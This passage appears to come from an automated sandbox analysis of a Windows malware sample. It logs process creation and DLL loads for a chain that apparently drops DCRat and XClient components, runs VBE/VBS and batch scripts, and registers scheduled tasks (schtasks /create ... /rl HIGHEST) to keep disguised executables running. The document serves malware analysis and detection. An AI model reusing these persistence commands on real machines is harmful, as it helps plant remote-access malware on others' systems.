                      Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\conhost.exe "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\conhost.exe "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: unknownProcess created: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
